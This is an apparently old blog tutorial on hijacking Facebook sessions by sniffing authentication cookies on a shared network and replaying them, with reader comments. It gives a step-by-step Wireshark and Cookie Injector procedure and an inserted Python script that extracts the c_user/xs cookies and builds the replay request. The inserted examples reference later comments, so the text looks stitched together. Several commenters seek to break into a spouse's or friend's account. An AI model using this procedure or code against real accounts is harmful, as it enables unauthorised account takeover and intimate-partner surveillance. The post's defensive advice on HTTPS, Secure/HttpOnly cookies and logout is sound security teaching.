How to steal Facebook Authentication cookies

How to hack a Facebook account, or, more generally, how to hijack a PHP session by replaying its cookie. Yes, this is old news, and yes, it's a common vulnerability, but you get a better idea of what it is and how it works when things are explained in detail (with screenshots!).

Before we begin, however, I want to re-emphasize that it is VERY EASY to protect yourself against this sort of attack. Facebook supports HTTPS, so when you browse Facebook (or Twitter, for that matter), or if you have it bookmarked, make sure the URL starts with https:// rather than http://. A cookie sent over plain HTTP is readable by anyone on the path, and a session is only as safe as the least protected request that carries its cookie, so logging in over HTTPS and then browsing over HTTP gains you nothing. A VPN helps too, but only for the hop between you and the VPN endpoint; beyond that the traffic is plaintext again unless the site itself uses HTTPS. Also, if the 'victim' logs out of Facebook, the server invalidates the session and the attacker's copy of the cookie stops working, so it's good practice to actually log out and log back in again rather than relying on the 'remember me' checkbox, which keeps a long-lived cookie valid.
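Here is what the two pieces of advice above look like on the server side, as an added Python example that is not code from the original post and not Facebook's implementation: a session store whose logout deletes the server-side record, so a replayed copy of the cookie is rejected afterwards while a 'remember me' session stays valid for weeks, and a Set-Cookie builder and checker for the Secure and HttpOnly attributes that keep the cookie off plain-HTTP requests and out of document.cookie. SessionStore, build_set_cookie and audit_set_cookie are this example's own names, and the user id is the c_user value from the sanitized cookie below.

```python
"""Added example: server-side session handling that makes a stolen cookie
useless once the victim logs out, plus cookie attributes that keep the
cookie off plain-HTTP links and away from document.cookie.

All names here (SessionStore, build_set_cookie, audit_set_cookie) are
illustrative, not Facebook's or any framework's real API.
"""
import secrets
import time


class SessionStore:
    """In-memory session table keyed by an unguessable token.

    The token is what the Cookie header carries; the user identity lives
    only here on the server, so revoking the token ends the session for
    anyone holding the cookie, legitimate user and thief alike.
    """

    def __init__(self, lifetime_seconds=3600):
        self._sessions = {}              # token -> (user_id, expiry)
        self.lifetime = lifetime_seconds

    def login(self, user_id, remember_me=False, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)          # 256 bits from the CSPRNG
        lifetime = 30 * 24 * 3600 if remember_me else self.lifetime
        self._sessions[token] = (user_id, now + lifetime)
        return token

    def user_for(self, token, now=None):
        """User id for a presented cookie, or None if it is unknown,
        expired, or has been logged out."""
        now = time.time() if now is None else now
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user_id, expiry = entry
        if now >= expiry:
            del self._sessions[token]
            return None
        return user_id

    def logout(self, token):
        """Server-side invalidation: this, not clearing the browser's cookie
        jar, is what stops a replayed copy of the cookie."""
        self._sessions.pop(token, None)


def build_set_cookie(name, value, max_age=None):
    """Set-Cookie header value with the attributes the advice above implies:
    Secure (never sent over http://) and HttpOnly (absent from document.cookie)."""
    parts = [f"{name}={value}", "Path=/", "Secure", "HttpOnly", "SameSite=Lax"]
    if max_age is not None:
        parts.append(f"Max-Age={int(max_age)}")
    return "; ".join(parts)


def audit_set_cookie(header_value):
    """Return the protective attributes a Set-Cookie header is missing."""
    attrs = {p.strip().split("=", 1)[0].lower()
             for p in header_value.split(";")[1:]}
    return [wanted for wanted in ("secure", "httponly", "samesite")
            if wanted not in attrs]


def demo():
    """Victim logs in, attacker replays the sniffed token, victim logs out."""
    store = SessionStore()
    victim_token = store.login("100001230367821")   # user id: c_user from the post
    stolen = victim_token                            # the LAN sniffer has an exact copy
    before = store.user_for(stolen)                  # "100001230367821": hijack works
    store.logout(victim_token)                       # victim clicks Log Out
    after = store.user_for(stolen)                   # None: the replayed cookie is dead
    return before, after
```

The point of `logout` deleting the server-side entry is that the stolen token is identical to the victim's own, so there is nothing to distinguish the two holders; the only fix is to make the token itself stop meaning anything.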

Facebook, like many sites, operates using authentication cookies. Their auth cookies contain a variety of information, but for our purposes most of it is irrelevant: what matters is that whoever presents the cookie is treated as the logged-in user. Here is a sanitized cookie for reference:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; lsd=Xesut; lxe=greg.evans%40****************; c_user=100001230367821; lo=wl9fcGXMhPfoT4bAhKFP3Q; lxs=1; sct=1276721745; xs=a615cfe596448194d6e2a8d062a90e4e

You can see the 'lxe' field is the login. We haven't done any further research into what the various other fields mean, but using Facebook over plain HTTP you're leaking both the email address used for your login and the session cookie to anyone who can see your traffic.

The first thing you'll want to do is fire up your favorite packet capture application. For this example we've used Wireshark:

Next, set the display filter in the top left to http.cookie contains "datr" (use straight double quotes; a red filter bar means Wireshark rejected the syntax). This should show you only captured packets whose Cookie header contains the field we're looking for. You can see that in this screenshot we've already captured a cookie.

Once you've found a suitable cookie, copy it to the clipboard by right-clicking the Cookie line in the packet details and choosing Copy -> Bytes (Printable Text Only).

Next, open up Firefox. You'll need both Greasemonkey and the Cookie Injector user script.

Simply browse to Facebook, making sure you are not logged in:

Hit Alt-C to bring up the Cookie Injector dialog box:

Then paste in the cookie!

Hit refresh and, voilà, you're now logged in as your victim! Note that this doesn't give you access to their credentials: the cookie is a session token, not a password, so this is about the equivalent of walking up to their workstation while they're away from their desk and using Facebook. And as soon as the victim logs out, the session, and your access with it, is gone.
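The whole procedure above (capture, filter on the datr cookie, copy the Cookie header, replay it) done offline in Python, as an added example that is not part of the original post and not the Wireshark or Cookie Injector code. The three captured requests are constructed for the example (the cookie values are the sanitized ones from the post, with a made-up e-mail in lxe); find_cookies plays the role of the display filter http.cookie contains "datr", and hijack_request builds the request that Cookie Injector causes your browser to send, carrying only the c_user and xs cookies that comment 11 below reports as sufficient. All function names are this example's own.

```python
"""Added example: the sniff-and-replay steps done offline in Python instead
of Wireshark + Cookie Injector. Sample requests are constructed; the cookie
values come from the sanitized cookie in the post, the e-mail is made up.
"""
from urllib.parse import unquote

# Constructed sample "capture": three plaintext HTTP requests as a sniffer on
# the same LAN would see them. Only the first two carry a Facebook cookie.
CAPTURED_REQUESTS = [
    b"GET /home.php HTTP/1.1\r\nHost: www.facebook.com\r\n"
    b"Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; "
    b"lsd=Xesut; lxe=greg.evans%40example.com; c_user=100001230367821; "
    b"lo=wl9fcGXMhPfoT4bAhKFP3Q; lxs=1; sct=1276721745; "
    b"xs=a615cfe596448194d6e2a8d062a90e4e\r\n\r\n",
    b"GET /ajax/presence/update.php HTTP/1.1\r\nHost: www.facebook.com\r\n"
    b"Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; "
    b"c_user=100001230367821; xs=a615cfe596448194d6e2a8d062a90e4e\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: example.org\r\nCookie: PHPSESSID=deadbeef\r\n\r\n",
]

# The two cookies comment 11 reports as enough to resume the session.
SESSION_COOKIES = ("c_user", "xs")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; first occurrence of a name wins."""
    jar = {}
    for pair in value.split(";"):
        name, _, val = pair.strip().partition("=")
        if name and name not in jar:
            jar[name] = val
    return jar


def find_cookies(requests, needle="datr"):
    """Offline equivalent of the Wireshark display filter
    http.cookie contains "datr": yield (host, cookie jar) for every request
    whose Cookie header contains needle."""
    hits = []
    for raw in requests:
        _, headers = parse_request(raw)
        cookie = headers.get("cookie")
        if cookie and needle in cookie:
            hits.append((headers.get("host", ""), parse_cookie_header(cookie)))
    return hits


def leaked_login(jar):
    """The lxe cookie carries the login e-mail, URL-encoded."""
    return unquote(jar["lxe"]) if "lxe" in jar else None


def hijack_request(host, jar, path="/home.php"):
    """Build the replay request Cookie Injector effectively makes your browser
    send: the victim's session cookies on our own connection. Returns bytes
    ready for socket.sendall(); only the session cookies are forwarded."""
    cookie = "; ".join(f"{k}={jar[k]}" for k in SESSION_COOKIES if k in jar)
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n"
            f"Connection: close\r\n\r\n").encode()


if __name__ == "__main__":
    for host, jar in find_cookies(CAPTURED_REQUESTS):
        print(host, "login:", leaked_login(jar))
        print(hijack_request(host, jar).decode())
```

Nothing here is clever: the server cannot tell the replay from the original because the bytes in the Cookie header are identical, which is exactly why the only fixes are keeping those bytes off the wire (HTTPS plus the Secure attribute) and revoking them server-side on logout.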

Neat, huh? Pretty easy too. I smiled big when we demoed the attack in our lab. It's old, sure, but being successful is always a good feeling!

P.S.: This isn't REALLY Gregory Evans' account. We set up this account because, well, the name was available! We thought it was in good taste, as the No. 1 hacker's Twitter feed got hacked the other day, his site is riddled with XSS exploits, and his book is copypasta from a variety of certification exam prep books. Thanks to Nick and mckt for the work and tootilage, respectively. No noobs were harmed in the making of this film.

49 thoughts on "How to steal Facebook Authentication cookies"

  1. Where are you running Wireshark that you're capturing another user's cookies? Wouldn't that have to be run local to their system? Or local to the system they log in on?

  2. Yes, this attack is structured towards people on the LAN. In this case, we're assuming the attacker has either gained control of the upstream device (wifi AP, switch, etc.) or has performed an ARP poisoning attack or another MITM (man-in-the-middle) attack.

  3. A shame you're not publishing on your blog anymore! It was really interesting! I am a Derren Brown fanatic and a hak n00b, and so was really interested in your posts! Keep up the great posts and stuff... please!!!

    Hugo

  4. Hey, I am a n00b hacker, well, I am more a beginner than a n00b. Anyway, this post is very, very interesting, and it's a real shame you're not publishing posts like this any more.

  5. Thanks for this info! It may help catch the thief who robbed my neighbors house.

    On my advice, they were running web backup software on their new iMac. We saw there had been backups today (the day after the robbery). I recovered the Safari history and cookies which had been touched today. I could see the thief had logged into facebook in the history file. Stumped for a while, but then hit this page with a lucky Google search. The cookies in the cookies file didn’t quite match up, and had already expired, but I tried it anyway. Didn’t log me in, but did populate the login/email field with the thief’s email address. Got their profile page: picture, name, and a few other personal facts.

    Hope the police can/will arrest the guy with this evidence!

  6. Oh, epic! Good work, Justin!
    You might want to check this out too, since it touches directly on that subject:

    Also some things to consider:
    - use Maltego to find everything you can about the email address
    - contact Facebook and ask for their cooperation (though I'd contact the police/FBI first to get the paperwork started; companies are a lot more likely to work with you if you already have a case number)
    - email that address and try to start a conversation with the thief; if he replies, it's very likely you can get his home IP address. That way you can contact the ISP, give them the case number from the police and try to get them to act faster than they did for zoz (that YouTube link)

    Good luck!

  7. Thanks! Watched the video. Hilarious. Gave me the idea to look at the Keychain file; now I have the AirPort network name and password. The password is a phone number that, according to a reverse lookup site, is a landline in Hayward, CA (about 10 miles from where I live).

    The online backup service is BackBlaze. They've kindly provided the IP address from which the computer was last backing itself up. That also traces to Hayward, CA.

    The kid is on the football team at the community college in Hayward (facebook profile), and the 2010 roster lists his high school (guess which city?).

    For all intents and purposes, I know exactly where the computer is. Not that I’m going to mess with a 19 year-old thug from a bad neighborhood by myself. I really hope the police jump on this. Also, if our local police department (castrated by budget cuts) can’t pursue this, perhaps we can try the Hayward police.

    I’m a software guy (lots of enterprise SAS stuff) – this security stuff/white hat hacking is pretty fun and eye-opening!

    Thanks again!

  8. Pingback: Justin’s week in crime fighting « The Binders

  9. I’ve got a question for anyone who might be able to answer it:

    I am familiar with the more complex methods of hijacking HTTP sessions, and have regularly used wireshark to extract cookie data. However, I also have access to live .txt cookies (i.e., in the %userprofile%Cookies directory), and expect I can also use these in some manner. I’ve been trying to manipulate them for a few hours and have been unsuccessful.

    The cookie data I see includes “lu” and “datr”. Cookies are not marked “secure”. Via a network sniff (as above), I’ve noted that the wireshark cookie dump also includes a “c_user” cookie, not contained in the file-level cookies. I am curious if this might be necessary.

    I have also tried running application-level import / exports (with proper reencoding), and using manual cookie editors.

    The strange thing is, I actually got an import to work for me, only once, the very first time I tried it. I expected it would be easier, so I didn’t pay attention to the procedure.

    Anyone?

  10. @Cookie Monster: I've had my luck purely with copying the entirety of the cookie and pasting it in. I guess technically, if each value is a cookie, then it's multiple cookies, but it seems easy to just forklift it like I've described. I'd start by comparing the values side by side. My presumption is that whatever Facebook is using now will be the objective, so see what of that you can get with the directory method and see what else you need to fill in the gaps. Sorry I couldn't be of more help! Try it and report back your success! :D

  11. Thanks, Dan. Here is my update:

    The only two cookies required are c_user and xs. In a non-TLS’d wireshark capture, you will see that these are also present in POST packet which is being alt-c’d into Firefox. The datr and lu cookies are not needed.

    At a file level, there is the additional problem that IE8 is storing non-persistent cookies in memory only. They simply do not exist on disk. I've noted this behavior on my test systems, which are clean VMs running IE8 with default values (no InPrivate Filtering, etc.).

    I have also noted that – with Firefox and Chrome – the c_user and xs cookies are in fact available from disk. Maybe this is why your forklift was successful. I was also successful utilizing file data stored by these browsers.

    At this point, I am interested in either (a) finding a method to dump session cookies from RAM on a remote machine, or (b) forcing IE to write session cookies back to disk. Of course, any advice would certainly be welcome.

    Dan – I really enjoyed that Youtube video.

  12. I have a question that might be a bit dumb!
    I use the Firebug addon with Firefox, and when I tried to get the value of document.cookie, everything was there except the "xs", "datr", "lu" and "sct" cookie values. However, I found them in the request headers, which means that they get sent to the server but are hidden or excluded somehow from document.cookie.
    So, my question is, is this really possible?? I mean, is it possible to hide an active cookie from document.cookie??
    Thanks in advance

  13. Never mind about my previous question. I figured it out after some searching. Microsoft added the httponly option to cookies in IE 6 SP1; it's available in all modern browsers, and cross-site tracing, which was discovered in 2003, is blocked by almost all modern browsers.
    Now my dumb question (as usual xD) is... is there a way to get "httponly" cookies??? Any way??

  14. Pingback: Faceshark | lo0.nu

  15. If I wanted to log back into a Facebook acct that I used Cookie Injector on, I can't. I only get the username, but no password. I followed the exact procedure the first time, but this time I can't get into the account. Why is that?

  16. I want to check if my husband is doing something wrong and would like to catch this flirty bitch of his. He usually signs in to Facebook using my computer, and I wanted to be able to get into his account. I have all of his previous sessions in my history; please, please, please tell me what I should do to be able to enter his account.

    -leah

  17. Thanks, I have hacked one of my friends on the LAN. Thanks!!!

  18. This is a LAN-style attack, so you'd have to be on the same network, unless you control the uplink, in which case "you control their internet"..

  19. CAN YOU HELP ME PLEASE!!!!
    When I copy and paste it and click OK, a message comes up saying "All cookies have been written". What am I doing wrong? Please help ASAP!!!!!

  20. Help me please.. I'm following all the steps, but when I write "http.cookie contains "datr"" the filter bar turns red and it won't let me continue. Why is that happening?

  21. If the filter bar turns red, it means your syntax is incorrect.
    One way to proceed is to use tcpick instead of tcpdump or Wireshark; the syntax for pulling out cookies is much simpler.

    Another approach would be to try Network Miner; I'm pretty sure that can do it.
    If you're on Windows, you can just install Firesheep and that will work as well.

    This blog post was written BEFORE Firesheep existed, so things have gotten far, far easier.

  22. Pingback: Web Security: ASP.NET authentication cookies and their security - campusMVP.Net | campusMVP.Net

  23. Question: how do you sniff (with Wireshark) another PC's packets when it is not on the same LAN?

  24. One way to execute this attack is to not use Wireshark, but a combination of JavaScript injection and PHP to collect the cookie. Say you type this JavaScript injection; it will say Hello. Put alert("Hello"); and load the cookie-stealing script. I will have a site that does this automatically: sz7c39.x10.mx, but it will be password protected.

  25. IMPORTANT: be aware that you cannot access his account if your victim clicked "LOGOUT". Be aware that we are just hijacking the sessions, and once the user logs out it destroys the session... To test this, don't click "logout"! Just clear your cookies in the browser :D

  26. Why do you need Greasemonkey?
    I mean, you are not changing any source code or something.

  27. Would stealing the cookies still work if they’re connected to the wifi network on their phone?

  28. This trick won't work anymore...
    It only works with HTTP connections; Facebook now uses a secure connection (HTTPS).

  29. Hi, I capture with the Wireshark program, which distributes cookies. I think the issue is related to packet filtering. I am using Wireshark version 1.10.2. But I cannot find my search "http.cookie distributes contains" in all the packets listed, and under Edit > Preferences the filter expression is not limited to the long packets. Please help those who set the matter, and advice for network monitoring. tupsoft bigmother (arconsole) program. pop accurate reading of e-mails. log records and the internet. Goodbye

  30. Why can't I capture any cookies with Wireshark now? 18/10/2013. Did they patch it or something? Thanks.

  31. Congratulations, you've just figured out how to hijack your own Facebook!

    FYI, if you're thinking you're going to hijack someone else's account through this method, think again..
    (Of course, unless you can run Wireshark on their computer without them knowing)

  32. Pingback: What are some of the best Facebook hacking tips? - Quora

  33. Hey, I'm having a problem with this. How should we know that it's the datr one, and how will it know whose account we are hacking, as it is not mentioned anywhere?
